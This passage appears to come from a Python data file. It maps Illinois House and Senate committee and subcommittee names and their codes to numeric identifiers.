Subcommittee on Mandate Review", "SINS-ISMR"): "288", ("Insurance & Pensions", "SINS"): "95", ("Insurance", "HINS"): "94", ("Insurance", "SINS"): "95", ("Insurance: Health & Life", "HINS"): "94", ("Insurance: Property & Casualty", "HIPC"): "289", ("Intermodal Infrastructure", "HINI"): "290", ("International Trade & Commerce", "HITC"): "291", ("Job Growth, Preservation and Traini", "HLBR-LJGP"): "1115", ("Joint Comm. on Government Reform", "HJGR"): "292", ("Joint Comm. on Government Reform", "SCGR"): "293", ("Joint Committee on MPEA", "SMPE"): "294", ("Joint Committee on Pier", "PIER"): "295", ("Joint Criminal Justice Reform Comm.", "HCJR"): "296", ("Joint Criminal Justice Reform Comm.", "SCJR"): "297", ("Joint Task Force I & R", "JTIR"): "298", ("Jt. Task Force -- Rural Healthcare", "TFRH"): "299", ("Jud. Criminal - Special Issues", "SJCR-SJSI"): "300", ("Judicial Process Subcommittee", "HJUA-JUDP"): "301", ("Judiciary - Civil", "HJUA"): "7", ("Judiciary - Criminal", "HJUC"): "302", ("Judiciary Civil Law", "SJUD"): "8", ("Judiciary Criminal Law", "SJCR"): "303", ("Judiciary I - Civil Law", "HJUA"): "7", ("Judiciary II - Criminal Law", "HJUB"): "304", ("Judiciary", "HJUA"): "7", ("Judiciary", "SJUD"): "8", ("Justice System Subcommittee", "HMEH-JUST"): "305", ("Juvenile Justice & System-Involved", "HJJS"): "306", ("Juvenile Justice Reform", "HJJR"): "307", ("Juvenile Justice and System Involve", "HJUC-JUVE"): "308", ("KidCare Subcommittee", "HHSV-HKID"): "309", ("Labor & Commerce Committee", "HLBR"): "55", ("Labor & Commerce", "SCED"): "64", ("Labor & Commerce", "HLBR"): "55", ("Labor and Commerce", "SLAB"): "71", ("Labor", "HLBR"): "55", ("Labor", "SLAB"): "71", ("LaborSubcommittee on Special Issues", "SLAB-SLSI"): "19", ("Land and Solid Waste, Subcom", "HENE-LAND"): "310", ("Least Cost Power Procurement", "HPOW"): "311", ("Legislative Petitions", "SCLP"): "312", ("Legislative Review, Subcommittee", "HEXC-LEGI"): "313", ("Licensed Activities and Pensions", "SLIC"): 
"20", ("Licensed Activities", "SLIC"): "20", ("Licenses and Registration, Subcommi", "HTRN-LICN"): "22", ("Licenses, Subcommittee on", "HTRN-LICN"): "22", ("Licensure Review Subcommittee", "HBOL-LICR"): "314", ("Licensure Review", "HHCL-LICR"): "23", ("Licensures Review Subcommittee", "HHCL-LICE"): "23", ("Local Government Administration Sub", "HCOT-LOCG"): "317", ("Local Government Consolidation Sub", "HCOT-CTLG"): "318", ("Local Government Efficiency Subcomm", "HCOT-HLGE"): "319", ("Local Government Subcommittee", "HCOT-CTLC"): "1106", ("Local Government Subcommittee", "HCIV-CLOC"): "27", ("Local Government Subcommittee", "HCIV-HLOG"): "27", ("Local Government Subcommittee", "HCIV-LOGO"): "27", ("Local Government Subcommittee", "HCIV-LOGV"): "27", ("Local Government", "HLGV"): "315", ("Local Government", "SLGV"): "316", ("Local Retirement System Subcommitte", "HPPN-PLRS"): "1116", ("Long Term Care Subcommittee", "HINS-LTCI"): "321", ("Managing Sex Offender Issues, Subco", "HJUB-MSOI"): "322", ("Mandate Subcommittee", "HELM-MANS"): "323", ("Mandates Subcommittee", "SINS-SINM"): "28", ("Mandates of the Elementary & Sec Ed", "HELM-MAND"): "323", ("Mandatory Insurance, Subcommittee", "HINS-MAND"): "325", ("Mass Transit Compliance, Subcom", "HTRN-MASS"): "327", ("Mass Transit for Northeastern IL", "SMTN"): "328", ("Mass Transit", "HMAS"): "326", ("Med. 
Discipline/Ins./MalpracticeRef", "SJUD-SMED"): "329", ("Medicaid Managed Care T F", "MMTF"): "330", ("Medicaid Reform Committee", "HSMR"): "331", ("Medicaid Reform Subcommittee", "HHCA-MEDI"): "332", ("Medicaid Reform, Family & Children", "HMRF"): "333", ("Medicaid Subcommittee", "HAPH-MEDI"): "334", ("Medicaid Subcommittee", "HHSV-HMED"): "1117", ("Mental Health", "HMEH"): "335", ("Methamphetamine, Judiciary II Subco", "HJUB-METH"): "336", ("Mineral Rights, Judiciary I-Civil L", "HJUA-HJMR"): "337", ("Mineral and Surface Rights Issues", "HJUA-MSRI"): "338", ("Minority Procurement", "HSGA-MPRO"): "339", ("Minority/Disadvantage Analysis Subc", "HLBR-LMDA"): "1118", ("Mobile Home T.F.", "MHTF"): "340", ("Mobile Home T.F.", "SMHT"): "340", ("Motor Fuel Analysis Subcommittee", "HTRR-MOFA"): "342", ("Motorcycles/Trucking, Subcom", "HTRN-MOTO"): "343", ("Museums, Arts, & Cultural Enhanceme", "HMAC"): "344", ("Negotiations Subcommittee", "HAGC-NEGO"): "345", ("Negotiations Subcommittee", "HHCL-HNEG"): "346", ("Negotiations Subcommittee", "HHCL-NEGO"): "346", ("New State Programs or Expenditures", "HSGA-NEWS"): "347", ("No Child Left Behind Act of 2001", "SESE-SECL"): "36", ("Oversight Medicaid Mang. Care", "SOMM"): "30", ("Oversight Medicaid Mang. 
Care, Spec", "SOMM"): "44", ("Paratransit, Subcommittee on", "HMAS-PARA"): "349", ("Pay Day Loans, Subcommittee", "HFIN-PDAY"): "350", ("Payday and Title Loans, Subcommitte", "HFIN-LOAN"): "351", ("Penalty Enhancements and Enlargemen", "HJUB-HPEG"): "352", ("Pension Benefits Review", "SPAI-SPBR"): "0", ("Pension Fund Management Procurement", "PFMP"): "353", ("Pension Funds Management", "HPFM"): "354", ("Pension Investments", "PENI"): "355", ("Pensions & Investments", "SPAI"): "39", ("Pensions Subcommittee", "SINS-SINP"): "356", ("Pensions and Investments", "SPAI"): "39", ("Personnel & Pensions", "HPPN"): "357", ("Personnel Code Subcommittee", "HPPN-PPPC"): "1120", ("Petroleum Regulation Subcommittee", "HAGC-PETR"): "365", ("Police & First Responders", "HPFR"): "358", ("Police and Fire Pension Reform", "HPPN-PFPR"): "359", ("Practice Acts Subcommittee", "HHCL-HPAC"): "360", ("Prescription Drug Affordability", "HPDA"): "1121", ("Prevailing Wage Subcommittee", "HLBR-WAGE"): "361", ("Prison Reform", "HPRF"): "362", ("Procedures Subcommittee", "HSGA-PROC"): "363", ("Procurement", "SCOP"): "364", ("Property Tax Reform", "SREV-SRPT"): "43", ("Property Tax Subcommittee", "HREF-HPRP"): "42", ("Property Tax Subcommittee", "HREF-PROP"): "42", ("Property Tax Subcommittee", "HREF-PTAX"): "42", ("Property Tax Subcommittee", "HREF-RPTA"): "42", ("Property Tax", "HREF-PTAX"): "42", ("Property Tax, Subcommittee on", "HREV-PTAX"): "42", ("Property Tax, Subcommittee on", "HREV-RPTX"): "42", ("Pub. High. Ed. Adm. Cost. Tui. 
Fees", "SCHE-SPHE"): "368", ("Public Benefits Subcommittee", "HHSV-HPBE"): "46", ("Public Benefits Subcommittee", "HHSV-PUBL"): "46", ("Public Benefits Subcommittee", "HHSV-PUBT"): "46", ("Public Benefits Subcommittee", "HHSV-HPBH"): "46", ("Public Health Subcommittee", "HCON-PUHE"): "371", ("Public Health", "SPHL"): "370", ("Public Pension Investments", "SPPI"): "372", ("Public Pensions & State Investments", "SCPP"): "373", ("Public Policy & Accountability", "HPPA"): "374", ("Public Private Partnerships", "HPPP"): "375", ("Public Safety", "HJUB-SAFE"): "376", ("Public Safety: Police & Fire Commit", "HSPF"): "377", ("Public Utilities Cellular Service", "HPUB-CELL"): "379", ("Public Utilities Subcommittee", "HPUB-PUBL"): "380", ("Public Utilities", "HPUB"): "378", ("Qualifications Challenge Committee", "HQCC"): "381", ("Railroad Industry", "HRRI"): "382", ("Railroad Safety", "HRRS"): "383", ("Railroad and Air Transportation Sub", "HTRR-RAIL"): "384", ("Railroads, Ports and Aviation Subco", "HTRR-RPAV"): "385", ("Railroads, Subcommittee on", "HTRN-RAIL"): "386", ("Rapid Growth District & Special Ed.", "HELM-HRGD"): "387", ("Real & Personal Property Law Subcom", "HJUA-RPPL"): "388", ("Real Estate, Prop. 
Probate & Trust", "HJUA-HRPP"): "389", ("Real Estate, Property, Probate, Tru", "HJUA-RPPT"): "390", ("Red Light Camera Subcommittee", "HVES-REDL"): "391", ("Red Light", "HVES-HRED"): "391", ("Redistricting", "DIST"): "393", ("Redistricting", "SRED"): "394", ("Regional Equity, Mass Transit Subco", "HMAS-REGL"): "395", ("Registration & Regulation", "HREG"): "396", ("Regulatory Matters Subcommittee", "HPUB-REGU"): "410", ("Renewable Energy & Sustainability", "HRES"): "398", ("Renewable Energy", "HRNE"): "397", ("Residential Renters Rights & Respon", "HHUD-RENT"): "399", ("Residential Services for Persons", "HFEE-RSPM"): "400", ("Resources and Management Subcommitt", "HENG-RESO"): "401", ("Restorative Justice", "HREJ"): "402", ("Revenue & Finance", "HREF"): "403", ("Revenue & Spending Subcommittee", "HCOT-SPEN"): "406", ("Revenue Subcomm. on Special Issues", "SREV-SRSI"): "65", ("Revenue Subcommittee on Amendments", "SREV-SRAM"): "66", ("Revenue Subcommittee on Prop. Taxes", "SREV-SRPT"): "43", ("Revenue Subcommittee-Amendments", "SREV-SRAM"): "66", ("Revenue", "HREV"): "403", ("Revenue", "SREV"): "404", ("Review Subcommittee", "SINS-SINR"): "407", ("Revnue Subcommittee Special Issues", "SREV-SRSI"): "65", ("Roads, Bridges & Traffic Safety", "HTRN-ROAD"): "67", ("Roads, Bridges and Traffic Safety", "HTRN-ROAD"): "67", ("Rules", "HRUL"): "408", ("Rules", "SCOA"): "21", ("Rural Economic Development", "HRED"): "409", ("Sales & Other Tax, Subcommittee on", "HREV-RSOT"): "70", ("Sales and Other Taxes Subcommittee", "HREF-HSLE"): "70", ("Sales and Other Taxes Subcommittee", "HREF-SALE"): "70", ("Sales and Other Taxes Subcommittee", "HREF-STAX"): "70", ("Sales and Other Taxes", "HREF-STAX"): "70", ("Sales and Other Taxes, Subcommittee", "HREV-STAX"): "70", ("Sales, Amusement & Other Taxes", "HREF-RSAT"): "70", ("Scholarship Tax Credit Oversight", "HREF-STCO"): "72", ("School Buses Subcommittee", "HVES-BUSE"): "412", ("School Code Waivers, Subcommittee", "HELM-SCWA"): "413", 
("School Transportation", "HELM-STRN"): "414", ("Science, Technology, Engineering,", "HELM-STEM"): "415", ("Select Committee on Discipline", "HSCD"): "416", ("Sen. Comm. Whole", "SCWL"): "35", ("Sen. T.F. on IL Alcoholic Bev. La", "SIAB"): "417", ("Senate Committee of the Whole", "SCWL"): "35", ("Senate Education Funding Reform", "SEFR"): "418", ("Senior and Veterans Housing Sustain", "HECD-SVHS"): "419", ("Sentencing, Penalties and Criminal", "HJUC-SPCP"): "420", ("Sentencing, Penalties, and Criminal", "HJUC-CPCP"): "421", ("Sex Crime Subcommittee", "HJUB-SEXC"): "422", ("Sex Offenses Subcommittee", "HJUA-SEOF"): "423", ("Sex Offenses and Sex Offender Regis", "HJUC-SORE"): "424", ("Sex Offenses and Sex Offender Regis", "HJUC-SOSO"): "424", ("Single Family Homeownership Stabili", "HECD-SFHS"): "426", ("Sm Bus Empowerment Wkforce Develop", "HSBE"): "76", ("Small Business Empowerment & Workfo", "HSBE"): "76", ("Smart Growth & Regional Planning", "HSGR"): "427", ("Social Change Subcommittee", "HREJ-SOCH"): "428", ("Solid Waste Subcommittee", "HENE-SSSW"): "429", ("Solid Waste", "HENE-SWAS"): "429", ("Spec Committee on Education Reform", "SCER"): "431", ("Spec.Comm. on Impeachment Procedure", "SITP"): "433", ("Special Bills Subcommittee", "HSGA-HSPB"): "434", ("Special Budget Subcommittee", "HAPG-SPBU"): "435", ("Special Comm. on Medicaid Reform", "SCMR"): "436", ("Special Comm. 
on Watercraft Safety", "SCWS"): "437", ("Special Investigating Committee", "SPIC"): "438", ("Special Investigative Committee", "HSIC"): "439", ("Special Issues Subcommittee", "HAPE-APES"): "1103", ("Special Issues Subcommittee", "HELM-HSPI"): "440", ("Special Issues Subcommittee", "HELM-ISSU"): "440", ("Special Issues Subcommittee", "HELM-SPEC"): "440", ("SPECIAL Issues Subcommittee", "HELM-SPEC"): "440", ("Special Issues Subcommittee", "HELO-ISSU"): "443", ("Special Issues- Subcommittee", "HVES-TVSI"): "458", ("Special Issues Subcommittee", "HELO-ESSI"): "443", ("Special Issues Subcommittee", "HELM-ESSI"): "440", ("Special Issues Subcommittee", "HVES-TSPI"): "458", ("Special License Plate Subcomittee", "HSGA-LICN"): "444", ("Special License Plates Subcommittee", "HVES-SLPD"): "445", ("Special License Plates, Subcommitte", "HSGA-HSLP"): "446", ("Special Matters Subcommittee", "HPUB-MATT"): "447", ("Special Matters Subcommittee", "HPUB-SPMA"): "447", ("Special Needs Services", "HSNS"): "449", ("Special Subcommittee", "HSGA-SPEC"): "450", ("Special Subcommittee", "HINS-ISPC"): "1128", ("Special Vehicle License Plates, Sub", "HSGA-VEHI"): "451", ("Speed Limits Subcommittee", "HVES-SPED"): "452", ("St Govt Subcomm Spec Issues/Amends", "SGOA-SGIA"): "453", ("St. Govt Subcommittee on Amendments", "SGOA-SGSA"): "921", ("St. 
Govt Subcommittee on Finance", "SGOA-SGSF"): "455", ("State & Pension Fund Invest, Spec.", "SSPF"): "461", ("State Government & Veterans Affairs", "SGOA"): "3", ("State Government Administration", "HSGA"): "456", ("State Government Review", "SGOA-SSGR"): "457", ("State Government Subcommittee", "HSGA-SGAS"): "1000", ("State Government", "SGOA"): "3", ("State Retirement System Subcommitte", "HPPN-PSRS"): "1129", ("Sub Com State Univ Civil Serv Syst.", "SCHE-HECS"): "459", ("Sub Com on CA Affecting the Jud", "SJUD-SJCA"): "84", ("Sub on Community Youth Employment", "SHHS-CYEM"): "460", ("Sub on Constitutional Amendments", "SEXC-SECA"): "86", ("Sub on Constitutional Amendments", "SEXC-SSCA"): "86", ("Sub on EPA 111(d) Requirements", "SNVR-SECE"): "462", ("Sub on Economic Development", "SGOA-SOED"): "463", ("Sub on Emerging Tech & Spec.Issues", "SCOM-SCES"): "464", ("Sub on Governmental Operations", "SEXC-SEGO"): "32", ("Sub on Governmental Operations", "SEXC-SSGO"): "32", ("Sub on Hunting and Trapping", "SAGR-SAHT"): "466", ("Sub on Ins Mandates & Ins Issues", "SINS-SIMI"): "467", ("Sub on Issues Relating to DCFS", "SHHS-SHDC"): "468", ("Sub on Issues Relating to DCFS", "SHHS-SSDC"): "468", ("Sub on Mental Health Issues", "SEXC-SEMH"): "470", ("Sub on Research & Academic Medicine", "SCHE-HEAM"): "471", ("Sub on Transportation Innovation", "STRN-STRI"): "472", ("Sub. Comm on Statutes of Limitation", "SCCL-SCSL"): "473", ("Sub. Confined Animal Feeding Ops.", "SAGR-SCFO"): "474", ("Sub. on Public Notif.Requirements", "SLGV-SPNR"): "570", ("Sub. On The Const.and Redist Issues", "SJUD-SCRI"): "475", ("Sub. Public Higher Edu. Exec. Comp.", "SCHE-SPHC"): "476", ("Sub. on Auto Insurance Rates", "SINS-SIAR"): "477", ("Sub. on Compensation and Benefits", "SGOA-SCAB"): "511", ("Sub. on Consequences of Fed.Policy", "SHHS-SHFP"): "478", ("Sub. on Constitutional Amendments", "SEXC-EXCA"): "86", ("Sub. on Energy and Labor Policy", "SEXC-SELP"): "480", ("Sub. 
on Financial Regulation", "SFIC-SFSR"): "481", ("Sub. on Generation, Util, & Telecom", "SENE-SEGU"): "482", ("Sub. on Utility Rate Regulations", "SENE-SEUR"): "912", ("Sub. on Interscholastic Athletics", "SESE-SEIA"): "483", ("Sub. on Issues Impacting IL Youth", "SHHS-SIIY"): "484", ("Sub. on Police Professionalism", "SEXC-SCPP"): "485", ("Sub. on Water Related Issue", "SNVR-SEWI"): "486", ("Subcommittee on Business Entities", "SJUD-SCBE"): "497", ("Subcommittee on Drycleaners", "SNVR-SEDC"): "490", ("Subcommittee on Energy Innovation", "SENE-SENI"): "913", ("Sub. on Wireless Emerg Tel. Safety", "SGOA-SWET"): "487", ("Sub. on the Monetary Award Program", "SCHE-SMAP"): "488", ("Sub.Ins.Mandates & Special Issues", "SINS-SIIM"): "489", ("Sub.on Ins.Madates & Special Issues", "SINS-SIMS"): "489", ("Subcom Competitiveness & Innovation", "SCOM-SCCI"): "96", ("Subcomm Comm. Affairs", "SHCA-SCAF"): "909", ("Subcomm on Civil Process Procedure", "SJUD-SJPP"): "491", ("Subcomm on Health Care Licensing", "SLIC-SLHL"): "492", ("Subcomm on Pension Enhancements", "SPAI-SPPE"): "1", ("Subcomm on Property and Environment", "SJUD-SJPN"): "493", ("Subcomm. Global Warming & Energy", "SENV-SGWE"): "495", ("Subcomm. Waterfront Devel./Preserv.", "SENV-SEWD"): "496", ("Subcomm. on Civil Process&Procedure", "SJUD-SJCP"): "491", ("Subcomm. on Fertilizers & Chemicals", "SAGR-SAFC"): "4", ("Subcomm. on Property & Environment", "SJUD-SJPE"): "493", ("Subcomm. on Prscriptive Authority", "SLIC-SLPA"): "498", ("Subcomm.Medicaid &Provider Rate Ref", "SHHS-SMPR"): "500", ("Subcomm.on Containing Costs/Tuition", "SAPB-SCCT"): "501", ("Subcom. 
on Pension Consolidation", "SLIC-SLPC"): "510", ("Subcomm.on Pension Enhancements", "SPAI-SPBE"): "1", ("Subcommitte Pension Benefit Review", "SPAI-SPBR"): "0", ("Subcommittee - Nursing Home Care", "SPHL-SPNH"): "502", ("Subcommittee Legis.Tuition Waivers", "SEXC-SXTW"): "503", ("Subcommittee Traffic Safety", "STRN-STTS"): "504", ("Subcommittee on Airports", "STRN-STRA"): "901", ("Subcommittee on Amendments", "SCCP-SCPA"): "12", ("Subcommittee on Amendments", "SJUD-SJDA"): "505", ("Subcommittee on Amendments", "SJUD-SJOA"): "505", ("Subcommittee on Amendments", "SLGV-SLGA"): "507", ("Subcommittee on Amendments", "SLIC-SLAA"): "508", ("Subcommittee on Amendments", "SNVR-SNVA"): "509", ("Subcommittee on Amendments", "SPHL-SPHA"): "16", ("Subcommittee on Amendments", "SPHL-SPOA"): "16", ("Subcommittee on Amendments", "SPHL-SPSA"): "16", ("Subcommittee on Amendments", "SREV-SRVA"): "512", ("Subcommittee on Amendments", "STRN-STAM"): "18", ("Subcommittee on Amtrak", "STRN-STAK"): "903", ("Subcommittee on Animal Welfare", "SAGR-SAAW"): "513", ("Subcommittee on Annexation", "SLGV-SLGN"): "514", ("Subcommittee on Bail Reform", "SCCL-SCBR"): "515", ("Subcommittee on CLEAR Compliance", "SCCL-SCCC"): "516", ("Subcommittee on CLEAR Compliance", "SCCL-SCCL"): "516", ("Subcommittee on CLEAR Compliance", "SCCL-SCLR"): "516", ("Subcommittee on Campaign Finance", "SEXC-SECF"): "519", ("Subcommittee on Capital (AP)", "SAPB-SACP"): "1100", ("Subcommittee on Capital (TR)", "STRN-STOC"): "1102", ("Subcommittee on Charter Schools", "SESE-SBCS"): "520", ("Subcommittee on Charter Schools", "SESE-SECS"): "520", ("Subcommittee on Charter Schools", "SESE-SSCR"): "520", ("Subcommittee on Civil Rights", "SEXC-SECR"): "25", ("Subcommittee on Civil Rights", "SEXC-SSCR"): "25", ("Subcommittee on Civil Rights", "SEXC-SXCR"): "25", ("Subcommittee on Civil Rights", "SJUD-SJCR"): "522", ("Subcommittee on Climate Change", "SENV-SENC"): "26", ("Subcommittee on Coal Mining", "SAGR-SACM"): "523", 
("Subcommittee on Consolidation", "SLGV-SLCC"): "524", ("Subcommittee on Const. Amendments", "SEXC-SECA"): "86", ("Subcommittee on Const. Amendments", "SEXC-SXCA"): "86", ("Subcommittee on Consumer Protection", "SCOM-SCCP"): "914", ("Subcommittee on Court Fees & Fines", "SJUD-SCFF"): "525", ("Subcommittee on Cryptocurrencies", "SREV-SCCC"): "527", ("Subcommittee on Cybersecurity", "STIT-STIC"): "526", ("Subcommittee on Deregulation", "SENV-SEND"): "905", ("Subcommittee on Education", "SEXC-EXED"): "73", ("Subcommittee on Election Law", "SEXC-SBEL"): "29", ("Subcommittee on Election Law", "SEXC-SEEL"): "29", ("Subcommittee on Election Law", "SEXC-SSEL"): "29", ("Subcommittee on Election Reform", "SELC-SEER"): "529", ("Subcommittee on Employment Issues", "SLAB-SLEI"): "530", ("Subcommittee on Ethics", "SEXC-SXET"): "930", ("Subcommittee on Federal Taxes", "SREV-SCFT"): "194", ("Subcommittee on Firearms (CL)", "SCCL-SCFA"): "168", ("Subcommittee on Firearms (JU)", "SJUD-SSFA"): "531", ("Subcommittee on Firearms", "SJUD-SJFA"): "531", ("Subcommittee on Firearms", "SJUD-SJSF"): "531", ("Subcommittee on Food Labeling", "SAGR-SAFL"): "900", ("Subcommittee on Fracking", "SNVR-SESF"): "31", ("Subcommittee on Gaming Activities", "SGAM-SGGA"): "537", ("Subcommittee on Gaming", "SEXC-SEOG"): "210", ("Subcommittee on Gaming", "SEXC-SESG"): "210", ("Subcommittee on Gaming", "SEXC-SSGA"): "210", ("Subcommittee on Gov. 
Operations", "SEXC-SEGO"): "32", ("Subcommittee on Health Exchanges", "SINS-SIHE"): "538", ("Subcommittee on Housing", "SHCA-SCHO"): "539", ("Subcommittee on Immunization", "SPHL-SPOI"): "540", ("Subcommittee on Immunizations", "SPHL-PSOI"): "540", ("Subcommittee on Income Taxes", "SREV-SRIT"): "541", ("Subcommittee on Information Sharing", "SREV-SSIS"): "542", ("Subcommittee on Insurance Mandates", "SINS-SCIM"): "28", ("Subcommittee on Insurance Mandates", "SINS-SINM"): "28", ("Subcommittee on Lic.Professionals", "SLIC-SLLP"): "544", ("Subcommittee on Long Term Care", "SPHL-SPLT"): "545", ("Subcommittee on Mandates", "SESE-SEDM"): "546", ("Subcommittee on Medicaid", "SHHS-SHHM"): "547", ("Subcommittee on Mortgages", "SFIC-SFMG"): "548", ("Subcommittee on NCLB", "SESE-NLCB"): "36", ("Subcommittee on Natural Resources", "SENE-SENR"): "37", ("Subcommittee on New Districts", "SLGV-SGND"): "550", ("Subcommittee on Payday Loan Reform", "SFIC-SFPL"): "38", ("Subcommittee on Payday Loans", "SFIC-SFPD"): "38", ("Subcommittee on Pension Reform", "SPAI-SPPR"): "551", ("Subcommittee on Pension Reforms", "SPAI-SPIP"): "551", ("Subcommittee on Pensions", "SEXC-SEPE"): "553", ("Subcommittee on Prison Operation", "SGOA-SCPO"): "554", ("Subcommittee on Procedures", "SLGV-SLGP"): "555", ("Subcommittee on Procurement", "SEXC-SESP"): "556", ("Subcommittee on Procurement", "SEXC-SSOP"): "556", ("Subcommittee on Program Expansions", "SCHE-SHPE"): "558", ("Subcommittee on Property Tax", "SREV-SRPT"): "43", ("Subcommittee on Property Tax", "SREV-SUPT"): "43", ("Subcommittee on Property Taxes", "SREV-SRPR"): "43", ("Subcommittee on Property Taxes", "SREV-SRPT"): "43", ("Subcommittee on Public Safety", "SLGV-SLPS"): "561", ("Subcommittee on Railroad Safety", "STRN-SRRS"): "562", ("Subcommittee on Readiness", "SENE-SENR"): "908", ("Subcommittee on Red Light Cameras", "STRN-SRLC"): "563", ("Subcommittee on Redistricting I", "SRED-RRDI"): "564", ("Subcommittee on Redistricting II", 
"SRED-RRII"): "565", ("Subcommittee on Regulatory Reform", "SEXC-SERR"): "45", ("Subcommittee on Resolutions", "SGOA-SSUR"): "566", ("Subcommittee on Restorative Justice", "SEXC-SERJ"): "910", ("Subcommittee on Sales Taxes", "SREV-SRST"): "567", ("Subcommittee on Special Issues (AP)", "SAPB-SASI"): "571", ("Subcommittee on Special Issues (CE)", "SCED-SCSI"): "572", ("Subcommittee on Special Issues (CL)", "SCCL-SCLS"): "69", ("Subcommittee on Special Issues (CL)", "SCCL-SCSI"): "69", ("Subcommittee on Special Issues (CL)", "SCCL-SSSI"): "69", ("Subcommittee on Special Issues (EC)", "SNVR-SESI"): "587", ("Subcommittee on Special Issues (ED)", "SESE-SBSI"): "48", ("Subcommittee on Special Issues (ED)", "SESE-SESI"): "48", ("Subcommittee on Special Issues (ED)", "SESE-SSSI"): "48", ("Subcommittee on Special Issues (EN)", "SENE-SESI"): "57", ("Subcommittee on Special Issues (EX)", "SEXC-SESI"): "58", ("Subcommittee on Special Issues (EX)", "SEXC-SSSI"): "58", ("Subcommittee on Special Issues (GR)", "SGRM-SGRS"): "577", ("Subcommittee on Special Issues (HS)", "SHHS-HSSI"): "578", ("Subcommittee on Special Issues (HS)", "SHHS-SSSI"): "578", ("Subcommittee on Special Issues (IN)", "SINS-SISI"): "580", ("Subcommittee on Special Issues (JU)", "SJUD-SSSI"): "581", ("Subcommittee on Special Issues (LA)", "SLAB-SLAS"): "19", ("Subcommittee on Special Issues (LA)", "SLIC-LASI"): "51", ("Subcommittee on Special Issues (LA)", "SLIC-SLSI"): "51", ("Subcommittee on Special Issues (LB)", "SLAB-SLSI"): "19", ("Subcommittee on Special Issues (LC)", "SLAB-SLSI"): "19", ("Subcommittee on Special Issues (LG)", "SLGV-SLCS"): "13", ("Subcommittee on Special Issues (LG)", "SLGV-SLGS"): "13", ("Subcommittee on Special Issues (LG)", "SLGV-SLSI"): "13", ("Subcommittee on Special Issues (PH)", "SPHL-SPHI"): "17", ("Subcommittee on Special Issues (PH)", "SPHL-SPSI"): "17", ("Subcommittee on Special Issues (RV)", "SREV-SRSI"): "65", ("Subcommittee on Special Issues (RV)", "SREV-SSSI"): "65", 
("Subcommittee on Special Issues (SE)", "SENE-SESI"): "57", ("Subcommittee on Special Issues (SG)", "SGOA-SGSI"): "585", ("Subcommittee on Special Issues (SG)", "SGOA-SOSI"): "585", ("Subcommittee on Special Issues (SN)", "SNVR-SNSI"): "587", ("Subcommittee on Special Issues (ST)", "STRN-STSI"): "74", ("Subcommittee on Special Issues (TR)", "STRN-STSI"): "74", ("Subcommittee on Special Issues (TR)", "STRN-STTI"): "74", ("Subcommittee on Special Issues", "SCCL-SCSI"): "69", ("Subcommittee on Special Issues", "SCCP-SCPI"): "1002", ("Subcommittee on Special Issues", "SESE-SESI"): "48", ("Subcommittee on Special Issues", "SEXC-SXSI"): "568", ("Subcommittee on Special Issues", "SHHS-SHSI"): "569", ("Subcommittee on Special Issues", "SLAB-SLAI"): "19", ("Subcommittee on Special Issues", "SLIC-SLSI"): "51", ("Subcommittee on Special Issues", "SLIC-SLSS"): "51", ("Subcommittee on Special Issues", "SPHL-SPHS"): "17", ("Subcommittee on Special Issues", "SPHL-SPSI"): "17", ("Subcommittee on Special Issues", "SREV-SRSI"): "65", ("Subcommittee on Special Issues", "SREV-SRVS"): "65", ("Subcommittee on St. Gov Operations", "SEXC-SESG"): "589", ("Subcommittee on State & Local Govt.", "SEXC-SXLG"): "206", ("Subcommittee on State Designations", "SGOA-SGSD"): "591", ("Subcommittee on State Regulation", "SGAM-SGSR"): "592", ("Subcommittee on Tax Credits", "SREV-SRTC"): "593", ("Subcommittee on Tax Credits", "SREV-SSTC"): "593", ("Subcommittee on Tollways", "STRN-STOL"): "595", ("Subcommittee on Tort Reform", "SJUD-SJTR"): "596", ("Subcommittee on Tourism", "SREV-SRTM"): "597", ("Subcommittee on Transparency", "SENE-SENT"): "598", ("Substance Abuse Special", "HSSA"): "599", ("Substance Abuse Subcommittee", "HMEH-ABUS"): "600", ("Supplier Diversity, Special Com. 
On", "SCSD"): "623", ("Tax Policy: Business Climate Sub", "HREF-TAXB"): "601", ("Tax Policy: Business Climate Sub", "HSGA-TAXB"): "602", ("Tax Policy: Income Tax Subcommittee", "HSGA-TAXI"): "603", ("Tax Policy: Other Taxes Subcommitte", "HREF-TAXO"): "604", ("Tax Policy: Other Taxes Subcommitte", "HSGA-TAXO"): "605", ("Tax Policy: Sales Tax Subcommittee", "HREF-TASA"): "606", ("Tax Policy: Sales Tax Subcommittee", "HSGA-TAXS"): "607", ("Tax Sales Subcommittee", "HREF-TAXS"): "608", ("Taxi Policy: Income Tax Subcommitte", "HREF-TAXI"): "1003", ("Telecommunications & InfoTechnology", "STIT"): "610", ("Telecommunications & Technology", "STEL"): "611", ("Telecommunications Committee", "HTEL"): "75", ("Telecommunications", "HTEL"): "75", ("Telecommunications, Subcommittee on", "HPUB-TELE"): "612", ("Tollway Oversight Review Subcommitt", "HTOL-TOLL"): "614", ("Tollway Oversight", "HTOL"): "613", ("Tort Liability Law Subcommittee", "HJUA-TLLS"): "615", ("Tort Liability Subcommittee", "HJUA-JTOL"): "615", ("Tourism & Conventions", "HTOR"): "77", ("Tourism", "HTOR"): "77", ("Tourism, Hospitality & Craft Ind.", "HTHC"): "616", ("Towing Oversight Subcommittee", "HREF-HTOW"): "78", ("Towing Oversight Subcommittee", "HREF-TOWO"): "78", ("Trans Subcommittee Special Issues", "STRN-STSI"): "74", ("Trans. Regulation Accountability", "HTRR-TRAS"): "79", ("Trans. Subcommittee on Amendments", "STRN-STRA"): "11", ("Transit Management and Performance", "HMAS-TMAP"): "617", ("Transit, Subcommittee on", "HHUD-TRAN"): "618", ("Transparency Subcommittee", "HCOT-TRAN"): "619", ("Transportation & Motor Vehicles", "HTRN"): "621", ("Transportation Reg. and Reg. Subcom", "HTRR-TRRS"): "622", ("Transportation Subcomm. Amendments", "STRN-STRA"): "11", ("Transportation Subcomm. Spec. 
